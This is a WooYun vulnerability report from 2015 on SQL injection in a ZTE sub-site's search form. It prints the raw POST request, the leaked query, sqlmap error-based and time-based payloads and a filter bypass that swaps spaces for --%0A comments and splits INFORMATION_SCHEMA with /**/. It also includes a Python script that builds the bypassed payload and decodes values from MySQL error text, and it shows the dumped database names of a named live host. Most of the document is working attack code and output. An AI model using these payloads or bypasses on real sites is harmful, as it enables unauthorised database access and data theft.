WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-05-18: details reported to the vendor, awaiting the vendor's handling
2015-05-18: vendor confirmed; details disclosed to the vendor only
2015-05-28: details disclosed to core white hats and domain experts
2015-06-07: details disclosed to regular white hats
2015-06-17: details disclosed to intern white hats
2015-07-02: details disclosed to the public
WooYun: 6 SQL injections in a ZTE sub-site, bundled

Honestly, I really don't see why this one needs any bypass: a plain UNION pulls it straight out. By the way, this one still hasn't been fixed...

POST /index.php?ac=search&at=result HTTP/1.1
Content-Length: 89
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ztesoft.com:808/
Cookie: e25d4f441419921f549c45d086f5f27a=1431676163
Host: www.ztesoft.com:808
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

keyname=1&keyword=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e8%af%8d&lng=cn&mid=0

Parameter keyname: appending a quote triggers a database error.

mySQL info: Can not connect to MySQL server
Time:Etc/GMT-8 2015-05-15 16-00-04
SQL:SELECT COUNT(*) AS num FROM zte_document as a Left join zte_document_content as b On a.did=b.did WHERE a.lng='cn' AND a.isclass=1 AND a.islink=0 AND a.1\'\" like '%请输入关键词%'
Error???You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\" like '%\xE8\xAF\xB7\xE8\xBE\x93\xE5\x85\xA5\xE5\x85\xB3\xE9\x94\xAE\xE' at line 1
Access Query Errors

Note where the value lands: keyname is concatenated as a column name (a.<keyname> like '%<keyword>%'), so it sits in an identifier position and no quote is needed to break out; the quote only served to surface the full query.
Running sqlmap directly really doesn't get anywhere, so here is the bypass. Step 1: replace every space with --%0A (a dash comment followed by a newline), via a sqlmap tamper script:

---
Parameter: keyname (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: keyname=1 AND (SELECT 3634 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT (ELT(3634=3634,1))),0x717a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&keyword=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e8%af%8d&lng=cn&mid=0
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: keyname=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DEdd)&keyword=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e8%af%8d&lng=cn&mid=0
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
[16:13:11] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[16:13:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.10
back-end DBMS: MySQL 5.0

The injection is confirmed, but the database names still can't be dumped. Step 2: fetch the values as HEX, and insert an inline comment (/**/) between the schema name and the dot to get past the filter. Payload:

keyname=1 AND (SELECT 2505 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT MID((HEX(IFNULL(CAST(schema_name AS CHAR),0x20))),1,50) FROM INFORMATION_SCHEMA/**/.SCHEMATA LIMIT 5,1),0x717a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA/**/.CHARACTER_SETS GROUP BY x)a)

Result:

available databases [7]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] ztesoft_poll
[*] ztesoft_static
[*] ztesoft_website
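The two bypasses and the extraction channel above, as an added example that is not part of the original report and not the reporter's own tooling. It reproduces the observed query template, applies the space-to---%0A and INFORMATION_SCHEMA/**/. rewrites to the duplicate-key error-based vector from the sqlmap output, and parses the value back out of a MySQL "Duplicate entry" error. The filter rules (literal spaces and the substring "information_schema." blocked) are an assumption; the write-up only shows what got past them. The error text at the bottom is constructed to look like what the error page would carry for the first schema row; the 64-character cap on the key value shown in that error is the reason sqlmap pulls 50 characters per request.

```python
import re
import urllib.parse
from typing import Optional

# Added example, not code from the report. Assumed filter: literal spaces and the
# substring "information_schema." are blocked; everything else is taken from the
# payloads and error message shown in the write-up.

# Delimiters from the report's sqlmap payloads: 0x7162766b71 / 0x717a767171.
DELIM_START = bytes.fromhex("7162766b71").decode()   # 'qbvkq'
DELIM_STOP = bytes.fromhex("717a767171").decode()    # 'qzvqq'

# Query template recovered from the error page: keyname lands in an identifier
# position (a.<keyname>), so no quote is needed to break out of a string.
QUERY_TEMPLATE = ("SELECT COUNT(*) AS num FROM zte_document as a "
                  "Left join zte_document_content as b On a.did=b.did "
                  "WHERE a.lng='cn' AND a.isclass=1 AND a.islink=0 "
                  "AND a.{keyname} like '%{keyword}%'")


def sql_context(keyname: str, keyword: str) -> str:
    """Show where the two POST parameters land in the back-end query (no escaping, as observed)."""
    return QUERY_TEMPLATE.format(keyname=keyname, keyword=keyword)


def hex_literal(s: str) -> str:
    """0x... literal so the string needs no quote characters at all."""
    return "0x" + s.encode().hex()


def tamper(payload: str) -> str:
    """Apply the two bypasses from the write-up.

    1. space -> '--' + newline ('--%0A' once URL-encoded). MySQL treats '--'
       followed by whitespace as a comment to end of line; the newline both
       satisfies that whitespace rule and ends the comment, so tokens stay
       separated without a literal space (same idea as sqlmap's space2dash).
    2. 'INFORMATION_SCHEMA.' -> 'INFORMATION_SCHEMA/**/.' so a substring match
       on 'information_schema.' fails while MySQL ignores the inline comment.
    """
    payload = re.sub(r"(information_schema)\.", r"\1/**/.", payload, flags=re.IGNORECASE)
    return payload.replace(" ", "--\n")


def error_based_payload(inner_query: str, randnum: int = 3634) -> str:
    """The duplicate-key vector from the sqlmap output, with the report's delimiters.

    FLOOR(RAND(0)*2) is not stable under GROUP BY, so MySQL raises
    "Duplicate entry '<delim><result><delim>1' for key 'group_key'" and the
    error text carries the subquery result.
    """
    return (f"1 AND (SELECT {randnum} FROM(SELECT COUNT(*),"
            f"CONCAT({hex_literal(DELIM_START)},({inner_query}),"
            f"{hex_literal(DELIM_STOP)},FLOOR(RAND(0)*2))x "
            f"FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)")


def schema_name_query(row: int, offset: int = 1, length: int = 50) -> str:
    """Step two of the write-up: one schema name as HEX, 50 characters at a time.

    HEX keeps the value ASCII-safe on the error page, and 50 chars plus two
    5-char delimiters and the trailing 0/1 stay inside the 64-char key value
    MySQL prints in a duplicate-entry error.
    """
    return (f"SELECT MID((HEX(IFNULL(CAST(schema_name AS CHAR),0x20))),{offset},{length}) "
            f"FROM INFORMATION_SCHEMA.SCHEMATA LIMIT {row},1")


def post_body(keyname_payload: str, keyword: str = "test") -> str:
    """URL-encode the POST body used in the report; the newline becomes %0A here."""
    return urllib.parse.urlencode(
        {"keyname": keyname_payload, "keyword": keyword, "lng": "cn", "mid": "0"})


def parse_duplicate_entry(error_text: str) -> Optional[str]:
    """Pull the value between the delimiters out of a MySQL duplicate-entry error."""
    m = re.search(re.escape(DELIM_START) + r"(.*?)" + re.escape(DELIM_STOP), error_text)
    return m.group(1) if m else None


def decode_hex_chunk(chunk: str) -> str:
    """Turn one HEX() chunk back into text."""
    return bytes.fromhex(chunk).decode("utf-8", errors="replace")


# Constructed sample (not captured from the target) of the error text for LIMIT 0,1.
SAMPLE_ERROR = ("Duplicate entry 'qbvkq696E666F726D6174696F6E5F736368656D61qzvqq1' "
                "for key 'group_key'")

if __name__ == "__main__":
    payload = tamper(error_based_payload(schema_name_query(0)))
    print(post_body(payload))
    print(decode_hex_chunk(parse_duplicate_entry(SAMPLE_ERROR)))
```

Running it prints a body with no literal space and both schema references split by /**/, then decodes the sample error to information_schema; for a real name longer than 25 bytes (50 hex characters), loop over offset 1, 51, 101, ... and concatenate the chunks before decoding.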
Severity: Low
Vulnerability rank: 5
Confirmed: 2015-05-18 08:59
Thanks~
None yet